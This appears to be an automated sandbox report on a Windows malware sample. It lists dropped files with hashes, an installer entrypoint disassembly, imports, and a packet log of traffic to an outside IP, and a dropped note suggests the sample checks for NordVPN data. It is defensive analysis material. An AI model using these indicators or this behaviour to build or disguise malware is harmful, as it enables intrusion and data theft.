                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...........~.....&"...%.h..........P..........V.............................P.......O....`... .................................................\....0..8....................@..l...........................@...(....................................................text...hf.......h..................`..`.data................l..............@....rdata..P............n..............@..@.pdata..............................@..@.xdata..............................@..@.bss.....................................edata..............................@..@.idata..\...........................@....CRT....X...........................@....tls......... ......................@....rsrc...8....0......................@....reloc..l....@......................@..B................................................................................................................................
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):773968
                                                Entropy (8bit):6.901559811406837
                                                Encrypted:false
                                                SSDEEP:12288:nMmCy3nAgPAxN9ueqix/HEmxsvGrif8ZSy+rdQw2QRAtd74/vmYK6H3BVoe3z:MmCy3KxW3ixPEmxsvGrm8Z6r+JQPzV7z
                                                MD5:0E37FBFA79D349D672456923EC5FBBE3
                                                SHA1:4E880FC7625CCF8D9CA799D5B94CE2B1E7597335
                                                SHA-256:8793353461826FBD48F25EA8B835BE204B758CE7510DB2AF631B28850355BD18
                                                SHA-512:2BEA9BD528513A3C6A54BEAC25096EE200A4E6CCFC2A308AE9CFD1AD8738E2E2DEFD477D59DB527A048E5E9A4FE1FC1D771701DE14EF82B4DBCDC90DF0387630
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.y.~...~...~...w...}...~.......eD.....eD..+...eD..J...eD......eD......eD......eD......Rich~...................PE..L......M.........."!.........................0.....x......................................@..........................H......d...(.......................P.......$L...!..8...........................hE..@............................................text...!........................... ..`.data....Z...0...N..................@....rsrc................f..............@..@.reloc..$L.......N...j..............@..B................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):12288
                                                Entropy (8bit):5.814115788739565
                                                Encrypted:false
                                                SSDEEP:192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
                                                MD5:CFF85C549D536F651D4FB8387F1976F2
                                                SHA1:D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
                                                SHA-256:8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
                                                SHA-512:531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):429
                                                Entropy (8bit):7.2660585571428715
                                                Encrypted:false
                                                SSDEEP:12:6v/723xn6PprukRVpsTWuFTEmRpnJGoQ6:9n6P7RvsTWuFTXpnNQ6
                                                MD5:84D033B14C06568FA57352CCF18D8D35
                                                SHA1:1D75B42F61842E8B0FA8D811DAC72B313CDDCA74
                                                SHA-256:3989B93626DC3ED6EF03430AD0B1FF5C6E358DAC76E34ED7C8086579B68E660F
                                                SHA-512:EAFE07814DF75D019EB39D999325818CE8F2D164A621E713709EE5E1F3D260EB6BCAA726A17588D034F6A6E7733B71A5141CE5B4CFCE267CBFA22B82D6227783
                                                Malicious:false
                                                Preview:.PNG........IHDR................a...tIDATx..S.n.P.-.6w7..8;...#.E.].8.....wh.O."......`....^o{...4.R .....4..F{....h..}o.X..d...4M..V.ELH.aA.-.%D<..g.Tj.....x....[E(..J.z..n7...R..X..\..D...!..h5............3.w/... ....K.;c....MO.O.`........h4..d......`~T9::"..I...0p.R..\.....&.....;.F..X.a....;.._%....P.\.B.D..t.D..Y....B.Z..1...5U.U...1...Z..D"R.T..w@:...%.....\...\..-.B......E{....h..;w....p..+....IEND.B`.
                                                Process:C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:dropped
                                                Size (bytes):335
                                                Entropy (8bit):4.737555359684875
                                                Encrypted:false
                                                SSDEEP:6:TMVBd/6o8GUYl/n7S3mc4slZRI2rjFvRbWHFHUHFvCpifW1IUHFBLJZtSKlNK+:TMHdPnnl/nu3i2FZ484sIBLjdlj
                                                MD5:C05C42CB3D95BF3BC7F49CCD8DCCA510
                                                SHA1:20442E344E95508586B1B2A7B4C6272C3F5C86F8
                                                SHA-256:695554CE5F23A275D3C25C27410D0CFBF8A83156807DAA3A601635E4E5D8AED0
                                                SHA-512:0EC19BBA7B5032670524965A8C55D8C6401F833000880DE1C0F74A5EAA4E302B0CE3E60218F3DDB95CB3E1EA7374A197CB71682526DFF910D9A6CF35FF971BB6
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg height="16px" viewBox="0 0 16 16" width="16px" xmlns="http://www.w3.org/2000/svg">. <path d="m 4 1 c -1.660156 0 -3 1.339844 -3 3 v 8 c 0 1.660156 1.339844 3 3 3 h 8 c 1.660156 0 3 -1.339844 3 -3 v -8 c 0 -1.660156 -1.339844 -3 -3 -3 z m 0 6 h 8 v 2 h -8 z m 0 0" fill="#2e3436"/>.</svg>.
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):30
                                                Entropy (8bit):3.964735178725505
                                                Encrypted:false
                                                SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                                                MD5:9F754B47B351EF0FC32527B541420595
                                                SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                                                SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                                                SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                                                Malicious:false
                                                Preview:NordVPN directory not found!..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.766288797716623
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe
                                                File size:1007819
                                                MD5:77436b29832ded92b60491ea36018196
                                                SHA1:0314eca204964e3e189b0c0aed7f449e487dc98e
                                                SHA256:b19c8495104c354de9aa1b3403bff2d1211a89fe8892e866d2d8dfd7bb0ba5da
                                                SHA512:799337dba429abed98ace7b229214f33706e0f00629992617327706694ec67c45ef9fdb878567eeec27a0e84c8b3a2bae37f572d37a1491bf934571160fd3c7f
                                                SSDEEP:24576:bbHw3bPzBxU7lXzd2+gIsofFiXKU74yNC/:fHUnWxlMo9i6/
                                                TLSH:A52512216654F813E3900A71C5F6F3BD49B4FE382E61CA03A6687F2D363E75C9929312
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                                                Icon Hash:7cbc7e6e78b0e010
                                                Entrypoint:0x40352d
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                                                Instruction
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 000003F4h
                                                push ebx
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebx, ebx
                                                push 00008001h
                                                mov dword ptr [ebp-14h], ebx
                                                mov dword ptr [ebp-04h], 0040A2E0h
                                                mov dword ptr [ebp-10h], ebx
                                                call dword ptr [004080CCh]
                                                mov esi, dword ptr [004080D0h]
                                                lea eax, dword ptr [ebp-00000140h]
                                                push eax
                                                mov dword ptr [ebp-0000012Ch], ebx
                                                mov dword ptr [ebp-2Ch], ebx
                                                mov dword ptr [ebp-28h], ebx
                                                mov dword ptr [ebp-00000140h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007F716086261Ah
                                                lea eax, dword ptr [ebp-00000140h]
                                                mov dword ptr [ebp-00000140h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [ebp-0000012Ch]
                                                mov ecx, dword ptr [ebp-00000112h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [ebp-26h], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [ebp-2Ch], ax
                                                cmp dword ptr [ebp-0000013Ch], 0Ah
                                                jnc 00007F71608625EAh
                                                and word ptr [ebp-00000132h], 0000h
                                                mov eax, dword ptr [ebp-00000134h]
                                                movzx ecx, byte ptr [ebp-00000138h]
                                                mov dword ptr [00434FB8h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [ebp-0000013Ch]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [ebp-2Ch]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x86100xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x6c0000x28498.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                .ndata0x360000x360000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x6c0000x284980x28600False0.447235390867data5.43623310188IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountry
                                                RT_ICON0x6c3580x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                RT_ICON0x7cb800x94a8dataEnglishUnited States
                                                RT_ICON0x860280x5488dataEnglishUnited States
                                                RT_ICON0x8b4b00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 65279, next used block 4294967040EnglishUnited States
                                                RT_ICON0x8f6d80x25a8dataEnglishUnited States
                                                RT_ICON0x91c800x10a8dataEnglishUnited States
                                                RT_ICON0x92d280x988dataEnglishUnited States
                                                RT_ICON0x936b00x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                RT_DIALOG0x93b180x100dataEnglishUnited States
                                                RT_DIALOG0x93c180x11cdataEnglishUnited States
                                                RT_DIALOG0x93d380xc4dataEnglishUnited States
                                                RT_DIALOG0x93e000x60dataEnglishUnited States
                                                RT_GROUP_ICON0x93e600x76dataEnglishUnited States
                                                RT_VERSION0x93ed80x27cdataEnglishUnited States
                                                RT_MANIFEST0x941580x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                                                DLLImport
                                                ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                                                DescriptionData
                                                LegalCopyrightEuthanasiachromo202
                                                FileVersion24.24.17
                                                CompanyNameConciliato
                                                LegalTrademarksLASHINGPREEXPOU
                                                CommentsSubconceptflovse2
                                                ProductNameRitha
                                                FileDescriptionandenk
                                                Translation0x0409 0x04b0
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSource PortDest PortSource IPDest IP
                                                May 27, 2022 21:11:34.457545042 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.581590891 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.581911087 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.582463026 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.706456900 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707243919 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707329035 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707391977 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707426071 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.707488060 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707515001 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.707585096 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.707587957 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707657099 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.707676888 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707755089 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707817078 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707865000 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.707885981 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.707918882 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.707982063 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.708022118 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.708080053 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.708204031 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.831994057 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832139969 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832201958 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832287073 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832357883 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832412958 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832459927 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832510948 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832515001 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832598925 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832601070 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832675934 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832695961 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832747936 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832801104 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832801104 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832850933 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832869053 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832917929 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832933903 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.832989931 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.832997084 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833055973 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833106041 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833113909 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.833167076 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.833170891 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833229065 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833283901 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.833286047 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833333969 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.833348036 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833404064 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.833447933 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.833499908 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.833571911 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.957458019 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.957545042 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.957684994 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.957781076 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.957817078 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.957885027 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.957921982 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958045006 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958084106 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958137989 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958192110 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958194971 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958259106 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958307981 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958312035 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958354950 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958378077 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958436966 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958479881 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958523989 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958539963 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958607912 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958620071 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958683014 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958683968 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958745003 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958791018 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958796978 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958844900 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958858013 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958908081 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.958918095 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.958995104 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959007978 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959064960 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959115028 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959120989 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959178925 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959187984 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959240913 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959243059 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959301949 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959353924 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959358931 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959415913 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959465981 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959465981 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959513903 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959527969 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959573984 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959587097 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959642887 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959671974 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959714890 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959775925 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959800005 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959839106 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959847927 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959903002 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959924936 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.959968090 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.959996939 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.960027933 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.960078955 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.960123062 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.960129976 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.960186005 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.960196018 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:34.960239887 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.960323095 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:34.960483074 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.084196091 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084306002 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084367037 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.084417105 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084455013 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.084537029 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084589958 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.084650040 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084686995 CEST4972780192.168.11.20103.211.219.10
                                                May 27, 2022 21:11:35.084738016 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084790945 CEST8049727103.211.219.10192.168.11.20
                                                May 27, 2022 21:11:35.084795952 CEST4972780192.168.11.20103.211.219.10
